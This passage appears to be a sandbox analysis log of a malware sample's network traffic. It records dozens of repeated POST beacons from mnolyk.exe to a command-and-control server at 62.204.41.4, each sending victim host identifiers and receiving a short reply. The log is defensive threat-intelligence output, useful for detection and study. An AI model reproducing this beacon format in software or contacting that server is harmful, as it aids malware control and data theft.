Feb 7, 2023 19:58:10.825829029 CET	449	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:10.890811920 CET	449	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
231	192.168.2.5	49941	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:11.058629036 CET	450	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:11.123760939 CET	450	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
232	192.168.2.5	49942	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:11.343154907 CET	451	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:11.407732964 CET	451	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
233	192.168.2.5	49943	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:11.590298891 CET	452	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:11.654761076 CET	452	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
234	192.168.2.5	49944	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:11.828444004 CET	453	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:11.891484976 CET	453	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
235	192.168.2.5	49945	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:12.060540915 CET	454	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:12.126838923 CET	454	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
236	192.168.2.5	49946	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:12.312159061 CET	455	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:12.375981092 CET	455	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
237	192.168.2.5	49947	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:12.542504072 CET	456	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:12.605254889 CET	456	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
238	192.168.2.5	49948	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:12.777625084 CET	457	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:12.842132092 CET	457	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
239	192.168.2.5	49949	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:13.013963938 CET	458	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:13.079219103 CET	458	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	49724	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:11.745482922 CET	152	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:11.811316967 CET	152	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
240	192.168.2.5	49950	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:13.249773026 CET	459	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:13.312338114 CET	459	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
241	192.168.2.5	49951	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:13.482140064 CET	460	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:13.546941996 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
242	192.168.2.5	49952	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:13.723294973 CET	461	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:13.784904957 CET	461	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
243	192.168.2.5	49953	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:13.951277971 CET	462	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:14.017504930 CET	462	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
244	192.168.2.5	49954	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:14.184521914 CET	463	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:14.247805119 CET	463	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
245	192.168.2.5	49955	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:14.419186115 CET	464	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:14.483352900 CET	464	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
246	192.168.2.5	49956	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:14.672244072 CET	465	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:14.736835957 CET	465	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
247	192.168.2.5	49957	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:14.905021906 CET	466	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:14.969731092 CET	466	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
248	192.168.2.5	49958	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:15.137845993 CET	467	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:15.202464104 CET	467	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
249	192.168.2.5	49959	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:15.371241093 CET	468	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:15.434111118 CET	468	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	49725	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:11.991746902 CET	153	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:12.057265997 CET	153	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
